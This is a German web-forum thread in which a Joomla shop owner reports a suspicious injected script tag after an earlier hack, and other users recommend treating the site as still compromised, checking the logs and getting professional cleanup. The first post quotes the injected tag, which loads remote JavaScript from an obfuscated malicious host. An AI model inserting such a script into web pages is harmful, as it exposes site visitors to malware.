Javascript

**canyonero** · 01.02.2010 17:23

Der folgende Code-Schnipsel findet sich seit kurzem in meiner Joomla-Website (1.5.15), sobald der Webshop (VirtueMart) aufgerufen wird.

Der Aufruf geht schief, aber sehr vertrauens-erweckend ist das nicht.

Code:

<script type="text/javascript" src="http://uimserv-net.tradedoubler.com.playstation-com.lagworld****:8080/google.com/google.com/gmx.net/komli.com/bestbuy.com/" defer="defer" id="Nudix7qln53d2"></script>

Habe schon template etc. durchsucht, aber nichts gefunden, wo der Scriptaufruf herkommt.

Kann jemand helfen?

Danke

C.

**BennoG** · 01.02.2010 18:44

Hallo,

wie sicher bist Du, das Deine Seite nicht doch gehackt wurde??
Zur Sicherheit: https://www.fc-hosting.de/joomla/tip...la-gehackt.php

**slowman2008** · 01.02.2010 18:51

Hallo,

ich würde mal salopp sagen, daß es sehr nach einem Hack ausschaut. Wenn Du nicht selber irgendetwas installiert hast ( Bannertausch, Affiliate oder so etwas in der Art ),
ist der Link in meinem Vorpost sehr hilfreich. Nenne doch mal Joomla Version, installierte Komponenten mit Versionsnummern und was Du sonst noch so installiert hast, vielleicht findet sich ja gleich die Lücke.

Gruß

Christoph

**canyonero** · 01.02.2010 20:05

Zitat von slowman2008

Hallo,

ich würde mal salopp sagen, daß es sehr nach einem Hack ausschaut.

Ja, die Seite war Ende Dezember gehackt worden, habe aber danach alle geänderten Dateien ausgetauscht (php, js, html) und danach das entsprechende 'clean.php' ausgeführt, was nichts gefunden hat.

**slowman2008** · 01.02.2010 22:38

Hallo,

..womit wieder einmal bewiesen wäre, daß Flickschusterei nach einem Hack in den wenigsten Fällen zum dauerhaften Erfolg führt. Wahrscheinlich ist irgendwo eine Shell oder Backdoor versteckt, so daß Dein Besuch jederzeit zum Kaffee, srich zum Scripthochladen o.ä., vorbeischauen kann.

Suche mal hier im Forum, da gibt es mittlerweile genug Links und Ratschläge, was nach einem Hack zu erledigen ist.

Gruß

Chris

**canyonero** · 02.02.2010 14:18

Das mag' sein, aber diese Vorgehensweise wurde Ende Dezember, Anfang Januar in diesem Forum bei dieser Art Angriff empfohlen (inkl. Änderung der Passwörter etc.), falls ich es richtig verstanden habe.

Nun wurde seither umfangreich Content erstellt, da wird dachten, alles wäre gut.

Vielleicht hat ja jemand noch eine Idee, wie man diesem Scriptaufruf auf die Spur kommt.

**deejey** · 02.02.2010 14:29

oh je, es ist ein großer Unterschied, ob eine Hobbyseite oder ein Shop gehackt wurde, mache es richtig und hole dir professionelle Hilfe, alles andere ist imho nur Rumgegnubbel und zu riskant

**j!-n** · 02.02.2010 15:38

Zitat von canyonero

Das mag' sein, aber diese Vorgehensweise wurde Ende Dezember, Anfang Januar in diesem Forum bei dieser Art Angriff empfohlen (inkl. Änderung der Passwörter etc.), falls ich es richtig verstanden habe.

Wenn die Lücke nicht beseitigt wurde, ist die Site nach wie vor angreifbar. Neue Reifen aufzuziehen, und zu hoffen, daß die Kiste besser bremst, kann fatal ins Auge gehen, wenn es an der Bremse liegt. Die Wahrheit steht in den Logfiles, bei Bedarf steh ich gern beiseite.

**canyonero** · 02.02.2010 16:02

Zitat von deejey

o...mache es richtig und hole dir professionelle Hilfe, alles andere ist imho nur Rumgegnubbel und zu riskant

Wie mache ich es richtig?
Backup von Mitte Dezember einspielen und den Content-Erstellern sagen, alles was seit Ende Dezember geschrieben wurde, ist weg?

**Derroylo** · 02.02.2010 16:04

Jemanden beauftragen das er die Seite für dich vom Schadcode bereinigt und das Sicherheitsloch schliesst => www.joomlajobs.de

Thema: Javascript

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Javascript

Lesezeichen

Lesezeichen

Berechtigungen